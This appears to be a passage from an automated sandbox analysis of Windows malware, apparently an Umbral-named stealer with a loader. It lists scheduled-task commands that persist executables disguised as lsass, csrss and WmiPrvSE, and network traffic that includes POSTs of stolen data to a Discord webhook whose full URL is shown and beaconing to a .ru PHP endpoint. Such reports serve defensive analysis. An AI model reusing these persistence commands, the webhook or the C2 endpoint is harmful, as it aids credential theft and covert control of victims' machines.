- Creates scheduled task(s)
PID:1368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Nurik\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Nurik\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2900

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\perfdhcpSvc\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4956

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\perfdhcpSvc\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\perfdhcpSvc\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:672

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3240

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Windows\twain_32\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\twain_32\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Windows\twain_32\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4476

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4488

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Nurik\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Nurik\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Nurik\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4932

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Windows\IdentityCRL\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Windows\IdentityCRL\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1144

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Portable Devices\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1172

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Defender\it-IT\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:820

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\it-IT\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Defender\it-IT\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2900

Network

DNS

154.239.44.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

154.239.44.20.in-addr.arpa

IN PTR

Response
DNS

105.83.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

105.83.221.88.in-addr.arpa

IN PTR

Response

105.83.221.88.in-addr.arpa

IN PTR

a88-221-83-105deploystaticakamaitechnologiescom
DNS

gstatic.com

Umbral.exe

Remote address:

8.8.8.8:53

Request

gstatic.com

IN A

Response

gstatic.com

IN A

172.217.16.227
GET

https://gstatic.com/generate_204

Umbral.exe

Remote address:

172.217.16.227:443

Request

GET /generate_204 HTTP/1.1
Host: gstatic.com
Connection: Keep-Alive

Response

HTTP/1.1 204 No Content

Content-Length: 0
Cross-Origin-Resource-Policy: cross-origin
Date: Fri, 17 May 2024 20:41:15 GMT
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

ip-api.com

LoaderMas.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/line/?fields=hosting

Umbral.exe

Remote address:

208.95.112.1:80

Request

GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Fri, 17 May 2024 20:41:15 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 32
X-Rl: 42
DNS

227.16.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

227.16.217.172.in-addr.arpa

IN PTR

Response

227.16.217.172.in-addr.arpa

IN PTR

mad08s04-in-f31e100net

227.16.217.172.in-addr.arpa

IN PTR

lhr48s28-in-f3�H
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
DNS

76.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

76.32.126.40.in-addr.arpa

IN PTR

Response
DNS

97.17.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.17.167.52.in-addr.arpa

IN PTR

Response
DNS

ip-api.com

LoaderMas.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/line/?fields=hosting

LoaderMas.exe

Remote address:

208.95.112.1:80

Request

GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Fri, 17 May 2024 20:41:21 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 27
X-Rl: 39
GET

http://ip-api.com/json/?fields=225545

Umbral.exe

Remote address:

208.95.112.1:80

Request

GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com

Response

HTTP/1.1 200 OK

Date: Fri, 17 May 2024 20:41:26 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 163
Access-Control-Allow-Origin: *
X-Ttl: 23
X-Rl: 37
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.dual-a-0034.a-msedge.net

g-bing-com.dual-a-0034.a-msedge.net

IN CNAME

dual-a-0034.a-msedge.net

dual-a-0034.a-msedge.net

IN A

204.79.197.237

dual-a-0034.a-msedge.net

IN A

13.107.21.237
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid=

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=3B0A0F1575376C95179F1B9774D76DDA; domain=.bing.com; expires=Wed, 11-Jun-2025 20:41:26 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 608D481C766A42AB982DA35551B48144 Ref B: LON04EDGE1211 Ref C: 2024-05-17T20:41:26Z
date: Fri, 17 May 2024 20:41:26 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid=

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=3B0A0F1575376C95179F1B9774D76DDA

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=Wbl7qRrr9oHR3dLn--kdfNrAbX_j2225WJUFnGXmoSQ; domain=.bing.com; expires=Wed, 11-Jun-2025 20:41:26 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9160C45EBCFF4A4A8A49B96491CF4514 Ref B: LON04EDGE1211 Ref C: 2024-05-17T20:41:26Z
date: Fri, 17 May 2024 20:41:26 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid=

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=3B0A0F1575376C95179F1B9774D76DDA; MSPTC=Wbl7qRrr9oHR3dLn--kdfNrAbX_j2225WJUFnGXmoSQ

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 78AAE2FFA7E04F88977986C529109970 Ref B: LON04EDGE1211 Ref C: 2024-05-17T20:41:26Z
date: Fri, 17 May 2024 20:41:26 GMT
DNS

237.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

237.197.79.204.in-addr.arpa

IN PTR

Response
DNS

discord.com

Umbral.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.135.232

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.137.232
POST

https://discord.com/api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ

Umbral.exe

Remote address:

162.159.128.233:443

Request

POST /api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ HTTP/1.1
Accept: application/json
User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 941
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 204 No Content

Date: Fri, 17 May 2024 20:41:27 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
set-cookie: __dcfduid=d579be5a148d11efa4a1ea730e45241a; Expires=Wed, 16-May-2029 20:41:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715978488
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pKqUXEI9FBKbNVNvIKJqFavgiDAfX%2FEVk58AfAM8ovcHYciosRruYFWFIyg4x%2BU7Ozw7CQCRB9LYb17FAUT62QoiDi%2F8vNAsgf5bQbhLjtbEB82wpuLEKdf9uxnA"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=d579be5a148d11efa4a1ea730e45241a75557535158e6d9c61309e13f31ac86aef87e9668b3290eeb6a49fd6018412fc; Expires=Wed, 16-May-2029 20:41:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=bb69fbf806994cc378399a58956bff492d0a0137-1715978487; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=wp9LJ0nQZ7GRugXk5Sr5yzdtRbDHnt5KcMzrbDJsWNQ-1715978487672-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 88566da9fb76240e-LHR
POST

https://discord.com/api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ

Umbral.exe

Remote address:

162.159.128.233:443

Request

POST /api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ HTTP/1.1
Accept: application/json
User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
Content-Type: multipart/form-data; boundary="e0e3ec5c-5276-4798-b82a-f627bee59bf8"
Host: discord.com
Cookie: __dcfduid=d579be5a148d11efa4a1ea730e45241a; __sdcfduid=d579be5a148d11efa4a1ea730e45241a75557535158e6d9c61309e13f31ac86aef87e9668b3290eeb6a49fd6018412fc; __cfruid=bb69fbf806994cc378399a58956bff492d0a0137-1715978487; _cfuvid=wp9LJ0nQZ7GRugXk5Sr5yzdtRbDHnt5KcMzrbDJsWNQ-1715978487672-0.0.1.1-604800000
Content-Length: 328880
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Fri, 17 May 2024 20:41:28 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715978489
x-ratelimit-reset-after: 1
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jw6PlB6jBoQlJyXdcxXpcX835RIA%2BVimcFqNuQ5wdFwDNsuXAFJABITwoIZr%2BT%2F7gSZUwzg5fiwhBd6vuW%2FRSk9LXfyuaE8b%2BfMzEF9II1Q%2FVz7jQFLGv6uuY04D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Server: cloudflare
CF-RAY: 88566dac1e84240e-LHR
DNS

233.128.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.128.159.162.in-addr.arpa

IN PTR

Response
DNS

71.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

71.159.190.20.in-addr.arpa

IN PTR

Response
DNS

57.169.31.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

57.169.31.20.in-addr.arpa

IN PTR

Response
GET

https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

Remote address:

2.17.107.122:443

Request

GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
host: www.bing.com
accept: */*
cookie: MUID=3B0A0F1575376C95179F1B9774D76DDA; MSPTC=Wbl7qRrr9oHR3dLn--kdfNrAbX_j2225WJUFnGXmoSQ
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QWthbWFp
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1107
date: Fri, 17 May 2024 20:41:29 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.766b1102.1715978489.60057ece
DNS

122.107.17.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

122.107.17.2.in-addr.arpa

IN PTR

Response

122.107.17.2.in-addr.arpa

IN PTR

a2-17-107-122deploystaticakamaitechnologiescom
DNS

a0948305.xsph.ru

StartMenuExperienceHost.exe

Remote address:

8.8.8.8:53

Request

a0948305.xsph.ru

IN A

Response

a0948305.xsph.ru

IN A

141.8.192.103
GET

http://a0948305.xsph.ru/_Defaultwindows.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF

StartMenuExperienceHost.exe

Remote address:

141.8.192.103:80

Request

GET /_Defaultwindows.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF HTTP/1.1
Accept: */*
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: a0948305.xsph.ru
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Fri, 17 May 2024 20:41:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
GET

http://a0948305.xsph.ru/_Defaultwindows.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF

StartMenuExperienceHost.exe

Remote address:

141.8.192.103:80

Request

GET /_Defaultwindows.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF HTTP/1.1
Accept: */*
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: a0948305.xsph.ru

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Fri, 17 May 2024 20:41:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
DNS

103.192.8.141.in-addr.arpa

Remote address:

8.8.8.8:53

Request

103.192.8.141.in-addr.arpa

IN PTR

Response

103.192.8.141.in-addr.arpa

IN PTR

hnossfromsh
DNS

157.123.68.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

157.123.68.40.in-addr.arpa

IN PTR

Response
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

144.107.17.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

144.107.17.2.in-addr.arpa

IN PTR

Response

144.107.17.2.in-addr.arpa

IN PTR

a2-17-107-144deploystaticakamaitechnologiescom
DNS

19.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.229.111.52.in-addr.arpa

IN PTR

Response
DNS

26.35.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.35.223.20.in-addr.arpa

IN PTR

Response
DNS

30.73.42.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

30.73.42.20.in-addr.arpa

IN PTR

Response

172.217.16.227:443

https://gstatic.com/generate_204

tls, http

Umbral.exe

868 B
5.4kB
11
10

HTTP Request

GET https://gstatic.com/generate_204

HTTP Response

204
208.95.112.1:80

http://ip-api.com/line/?fields=hosting

http

Umbral.exe

310 B
267 B
5
2

HTTP Request

GET http://ip-api.com/line/?fields=hosting

HTTP Response

200
208.95.112.1:80

http://ip-api.com/line/?fields=hosting

http

LoaderMas.exe

310 B
387 B
5
5

HTTP Request

GET http://ip-api.com/line/?fields=hosting

HTTP Response

200
208.95.112.1:80

http://ip-api.com/json/?fields=225545

http

Umbral.exe

285 B
512 B
5
4

HTTP Request

GET http://ip-api.com/json/?fields=225545

HTTP Response

200
204.79.197.237:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid=

tls, http2

2.0kB
9.2kB
21
18

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid=

HTTP Response

204
162.159.128.233:443

https://discord.com/api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ

tls, http

Umbral.exe

342.3kB
11.2kB
258
114

HTTP Request

POST https://discord.com/api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ

HTTP Response

204

HTTP Request

POST https://discord.com/api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ

HTTP Response

200
2.17.107.122:443

https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

tls, http2

1.5kB
6.4kB
16
12

HTTP Request

GET https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

HTTP Response

200
141.8.192.103:80

